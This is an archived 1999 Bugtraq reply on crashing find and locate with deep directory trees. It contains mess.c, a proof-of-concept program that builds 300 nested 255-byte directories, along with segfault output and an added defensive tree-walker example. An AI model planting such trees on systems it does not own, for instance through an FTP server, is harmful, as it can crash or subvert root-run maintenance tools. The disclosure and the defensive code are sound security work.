[10423] in bugtraq
Re: Buffer overflow in ftpd and locate bug
daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Mon May 3 19:30:16 1999
Mime-Version: 1.0
Content-Type: Multipart/Mixed; boundary=Message-Boundary-25450
Message-Id: <19990502183800.1113.qmail@venglin.gadaczka.org>
Date: Sun, 2 May 1999 20:37:35 CEST
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.990430105441.23881A-100000@gw.al.lg.ua>
> I had a problem with locate from findutils-4.1.24.rpm from Redhat-5.1.
> It segfaults if we have a huge directory at incoming ftp which was created
> by exploits for the ftpd realpath hole. My ftpd is patched. Those exploits,
> I think, should not scare me, but if updatedb puts that directory into the
> locate database then locate segfaults (getline.c row 104 by gdb).
> I guess it can be used for running arbitrary commands if root runs locate.
I've noticed a similar problem with /usr/bin/find on FreeBSD. By
creating a _very_ long and deep directory structure it's possible
to segfault /usr/bin/find (it's also used in the /etc/periodic scripts,
which run as root).
Example:
I'm creating a directory structure with 300 subdirectories, each
255 chars long (source in the attachment; it's also possible to do it
via ftpd, because it calls mkdir() and chdir()).
lagoon:venglin:/tmp/jc> find example > /dev/null
Segmentation fault (core dumped)
Gdb shows that the function puts() was overflowed when it tried to
print a very long path.
Other system tools (rm, ls) also have big problems with such
directory structures.
--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
---- File information -----------
File: mess.c
Date: 2 May 1999, 19:01
Size: 748 bytes.
Type: Text
/* mess.c: build a chain of nested directories below <dir>, each name
 * 255 bytes of 'A', one level per iteration. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define DUMP    0x41   /* 'A' */
#define NAMELEN 255    /* NAME_MAX on FreeBSD */

int main(int argc, char *argv[]) {
    char buf[NAMELEN + 1];
    int i, depth;

    if (argc < 3) { fprintf(stderr, "usage: %s <dir> <depth>\n", argv[0]); exit(1); }
    if (chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); }

    memset(buf, DUMP, NAMELEN);
    buf[NAMELEN] = '\0';   /* mkdir()/chdir() need a NUL-terminated name */
    depth = atoi(argv[2]);

    /* Create one 255-byte component and step into it; no single syscall
     * ever sees the full path, so its total length is unbounded. */
    for (i = 0; i < depth - 1; i++) {
        if (mkdir(buf, S_IRWXU | S_IRWXG | S_IRWXO)) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
        if (chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); }
    }
    exit(0);
}
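Added example, not part of the original post and not FreeBSD's find or ftpd code: a tree walker that is not bothered by the structure mess.c builds, because it never assembles the full path into a fixed-size array. Every lookup is relative to a directory file descriptor (openat, fstatat, fdopendir, unlinkat, all POSIX.1-2008), and the path kept for display lives in a heap buffer that grows on demand. It constructs its own test tree of 255-byte 'A' names under $TMPDIR (or /tmp), walks it, and deletes it again; the depth, the name length and the temp-dir prefix are the example's own choices.

```c
/* Added example (not from the post, not FreeBSD's find): walk a tree of any
 * depth via fd-relative calls, keeping the displayed path in a growable heap
 * buffer, so no fixed PATH_MAX array can be overrun. POSIX.1-2008 assumed. */
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define NAME_LEN 255                       /* NAME_MAX on FreeBSD and Linux */

struct pathbuf { char *s; size_t len, cap; };   /* growable relative path */

static int pb_push(struct pathbuf *pb, const char *name, size_t *saved) {
    size_t n = strlen(name), need = pb->len + n + 2;      /* '/' name NUL */
    *saved = pb->len;
    if (need > pb->cap) {
        size_t ncap = pb->cap ? pb->cap : 1024;
        while (ncap < need) ncap *= 2;
        char *t = realloc(pb->s, ncap);
        if (!t) return -1;
        pb->s = t; pb->cap = ncap;
    }
    if (pb->len) pb->s[pb->len++] = '/';
    memcpy(pb->s + pb->len, name, n + 1);
    pb->len += n;
    return 0;
}

static void pb_pop(struct pathbuf *pb, size_t saved) { pb->len = saved; pb->s[saved] = '\0'; }

/* Constructed input: `depth` nested dirs of NAME_LEN 'A's below dirfd, created
 * one component at a time (like mess.c) so no syscall sees the whole path. */
static int make_deep(int dirfd, int depth) {
    char name[NAME_LEN + 1];
    memset(name, 'A', NAME_LEN);
    name[NAME_LEN] = '\0';
    int fd = dup(dirfd);
    for (int i = 0; fd >= 0 && i < depth; i++) {
        int next = mkdirat(fd, name, 0700) ? -1 : openat(fd, name, O_RDONLY | O_DIRECTORY);
        close(fd);
        fd = next;                             /* -1 on any failure ends the loop */
    }
    if (fd < 0) return -1;
    close(fd);
    return 0;
}

struct stats { int max_depth; size_t max_path_len; };

/* Recurse below dirfd. Lookups are fd-relative and never follow symlinks, so a
 * deep or hostile tree cannot force an over-long path or escape the tree.
 * With remove_dirs set, directories are removed post-order on the way up. */
static int walk(int dirfd, struct pathbuf *pb, int depth, struct stats *st, int remove_dirs) {
    int fd = openat(dirfd, ".", O_RDONLY | O_DIRECTORY);  /* private fd for the stream */
    if (fd < 0) return -1;
    DIR *d = fdopendir(fd);                                /* closedir() closes fd */
    if (!d) { close(fd); return -1; }
    struct dirent *de;
    int rc = 0;
    while (rc == 0 && (de = readdir(d)) != NULL) {
        struct stat sb;
        size_t saved = 0;
        if (!strcmp(de->d_name, ".") || !strcmp(de->d_name, "..")) continue;
        if (fstatat(dirfd, de->d_name, &sb, AT_SYMLINK_NOFOLLOW) || pb_push(pb, de->d_name, &saved)) { rc = -1; break; }
        if (pb->len > st->max_path_len) st->max_path_len = pb->len;
        if (depth + 1 > st->max_depth) st->max_depth = depth + 1;
        if (S_ISDIR(sb.st_mode)) {
            int sub = openat(dirfd, de->d_name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
            if (sub < 0) rc = -1;
            else {
                rc = walk(sub, pb, depth + 1, st, remove_dirs);
                close(sub);
                if (rc == 0 && remove_dirs && unlinkat(dirfd, de->d_name, AT_REMOVEDIR)) rc = -1;
            }
        }
        pb_pop(pb, saved);
    }
    closedir(d);
    return rc;
}

/* Build a `depth`-level tree in a fresh temp dir, walk it, tear it down.
 * Returns the longest relative path seen (depth*255 + depth-1 slashes), 0 on failure. */
size_t demo_deep_tree(int depth) {
    char tmpl[4096];
    const char *tdir = getenv("TMPDIR");
    snprintf(tmpl, sizeof tmpl, "%s/deeptree.XXXXXX", tdir && *tdir ? tdir : "/tmp");
    if (!mkdtemp(tmpl)) return 0;
    int root = open(tmpl, O_RDONLY | O_DIRECTORY);
    if (root < 0) { rmdir(tmpl); return 0; }
    struct pathbuf pb = { NULL, 0, 0 };
    struct stats st = { 0, 0 };
    int built = make_deep(root, depth);
    int walked = walk(root, &pb, 0, &st, 1);   /* the walk also cleans up */
    free(pb.s); close(root); rmdir(tmpl);
    return (built == 0 && walked == 0 && st.max_depth == depth) ? st.max_path_len : 0;
}

int main(int argc, char *argv[]) {
    int depth = argc > 1 ? atoi(argv[1]) : 300;   /* the post used 300 levels */
    size_t longest = demo_deep_tree(depth);
    if (!longest) { fprintf(stderr, "deep tree build/walk failed\n"); return 1; }
    printf("%d levels: longest relative path is %zu bytes\n", depth, longest);
    return 0;
}
```

Run it as "./deepwalk 300" to reproduce the post's 300 x 255 layout: the longest relative path is 76799 bytes, far past any PATH_MAX, yet the walker only ever hands the kernel one 255-byte component at a time. The fixed-size buffer that a naive walker fills with the accumulated path is exactly the thing a directory tree built through ftpd's mkdir()/chdir() lets an anonymous user overrun.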